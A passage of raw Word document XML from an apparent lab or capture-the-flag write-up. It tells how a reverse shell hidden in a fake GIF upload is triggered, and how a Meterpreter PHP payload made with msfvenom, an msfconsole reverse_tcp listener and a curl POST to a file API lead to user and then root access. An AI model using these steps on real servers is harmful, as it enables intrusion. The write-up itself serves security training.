          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">So we cannot access or retrieve the log file. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2.3  Reverse Shell Trigger and Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63319BB1" w14:textId="3C735EBE" w:rsidR="003E1AF5" w:rsidRDefault="003E1AF5" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">But we remember the shell gif file we uploaded, so we change the body value to </w:t>
      </w:r>
      <w:r w:rsidR="001D3CBC">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/var/www/development/uploads/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001D3CBC">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>FRANKuploads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001D3CBC">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/shell.gif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31068334" w14:textId="5687D87B" w:rsidR="001D3CBC" w:rsidRDefault="001D3CBC" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D3CBC">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56CB89EF" wp14:editId="5977731C">
            <wp:extent cx="3057952" cy="3381847"/>
            <wp:effectExtent l="0" t="0" r="9525"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057952" cy="3381847"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3488C252" w14:textId="29399C78" w:rsidR="001D3CBC" w:rsidRDefault="001D3CBC" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Next we need to set up a listener. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2234639D" w14:textId="674BE91E" w:rsidR="001D3CBC" w:rsidRDefault="001D3CBC" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D3CBC">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28E88AAA" wp14:editId="7C1C5DEB">
            <wp:extent cx="2391109" cy="990738"/>
            <wp:effectExtent l="0" t="0" r="952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391109" cy="990738"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="663B21B3" w14:textId="4AABB797" w:rsidR="001D3CBC" w:rsidRDefault="001D3CBC" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">And now we can send the packets. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706A4535" w14:textId="43D08131" w:rsidR="00EF745F" w:rsidRDefault="00B444B3" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>First we identify the path and run the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F9093F" w14:textId="7C004967" w:rsidR="00B444B3" w:rsidRDefault="00B444B3" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B444B3">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C6D722E" wp14:editId="4D7AD312">
            <wp:extent cx="5943600" cy="4578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457835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="320CFBE4" w14:textId="16D6C8FC" w:rsidR="00B444B3" w:rsidRDefault="00B444B3" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B444B3">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7250E69F" wp14:editId="3DC05702">
            <wp:extent cx="5136776" cy="202836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156541" cy="2036173"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E93C8B" w14:textId="4D0BDE5A" w:rsidR="00B444B3" w:rsidRDefault="00B444B3" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We are in! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5E0812" w14:textId="51839D01" w:rsidR="00B444B3" w:rsidRDefault="00B444B3" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B444B3">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B1666AC" wp14:editId="63CAF261">
            <wp:extent cx="4992792" cy="449724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000664" cy="4504338"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2.4  User Level Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412B024F" w14:textId="6774490D" w:rsidR="00B444B3" w:rsidRDefault="000F6EAB" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Running the cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>txts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7323668A" w14:textId="379CD6CC" w:rsidR="000F6EAB" w:rsidRDefault="000F6EAB" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6EAB">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A81A6F2" wp14:editId="00108AFD">
            <wp:extent cx="4799250" cy="2765244"/>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824258" cy="2779653"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E9148A" w14:textId="1D2E5B6D" w:rsidR="000F6EAB" w:rsidRDefault="000F6EAB" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We escalated user by downloading a latest shell and running the command we got the flag! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16763021" w14:textId="4F21190F" w:rsidR="002E3A55" w:rsidRDefault="002E3A55" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>3  Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3.1  Local Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CB41B2" w14:textId="7DF9162C" w:rsidR="002E3A55" w:rsidRDefault="00B15D17" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B15D17">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalate privilege: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We need to run some commands to see we could get in with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>kron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">/jobs so we try to find out some local vulnerabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D483AE" w14:textId="41BA341C" w:rsidR="00B15D17" w:rsidRDefault="00B15D17" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B15D17">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7918C08E" wp14:editId="56CE41AB">
            <wp:extent cx="5943600" cy="462978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4629785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6DDABC" w14:textId="445252E7" w:rsidR="00B15D17" w:rsidRDefault="00B15D17" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B15D17">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A3AB71B" wp14:editId="7AB9C89E">
            <wp:extent cx="5943600" cy="8890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889000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25434B5A" w14:textId="67C07B69" w:rsidR="00B15D17" w:rsidRDefault="00B15D17" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We also got the version name. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4B620E" w14:textId="0CFD970B" w:rsidR="00CD72F8" w:rsidRDefault="00CD72F8" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7798404F" w14:textId="26E80332" w:rsidR="00CD72F8" w:rsidRDefault="00CD72F8" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3.2  Meterpreter Payload and Root Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCF6F9B" w14:textId="238AEEA4" w:rsidR="00CD72F8" w:rsidRDefault="00CD72F8" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> we are able to create a payload for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> php. And inject into the fake gif. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F1DFAC" w14:textId="4154E247" w:rsidR="00CD72F8" w:rsidRDefault="00CD72F8" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD72F8">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1238C06B" wp14:editId="4FE939A2">
            <wp:extent cx="4871677" cy="2384311"/>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883391" cy="2390044"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7079A33E" w14:textId="7363C1A6" w:rsidR="00CD72F8" w:rsidRDefault="00CD72F8" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Now in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> we are going to start a listener using multi handler. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5508EC0C" w14:textId="68D2C79B" w:rsidR="00CD72F8" w:rsidRDefault="00CD72F8" w:rsidP="000F6EAB">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&gt; use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>multihandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&gt; set payload php/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="794077DF" w14:textId="61EF9CB6" w:rsidR="00CD72F8" w:rsidRDefault="00CD72F8" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD72F8">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21ABE2AB" wp14:editId="07444AA0">
            <wp:extent cx="5076290" cy="4389148"/>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077582" cy="4390265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="405BE1FC" w14:textId="6C043272" w:rsidR="00CD72F8" w:rsidRDefault="009E60E8" w:rsidP="000F6EAB">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now to trigger the payload we run on a different terminal: </w:t>
      </w:r>
      <w:r w:rsidRPr="009E60E8">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>curl -X POST http://192.168.1.106:8011/api/files_api.php -d "file=/var/www/development/uploader/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E60E8">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>FRANKuploads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E60E8">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/final2.php.gif"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78104323" w14:textId="5D39D13F" w:rsidR="004F66E0" w:rsidRDefault="004F66E0" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we open a server from kali and upload the exploit file and once downloaded and run we get root. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287DB209" w14:textId="361B2926" w:rsidR="00D51DD0" w:rsidRDefault="00D51DD0" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D51DD0">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E7EE376" wp14:editId="71DC93B3">
            <wp:extent cx="5943600" cy="405193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4051935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
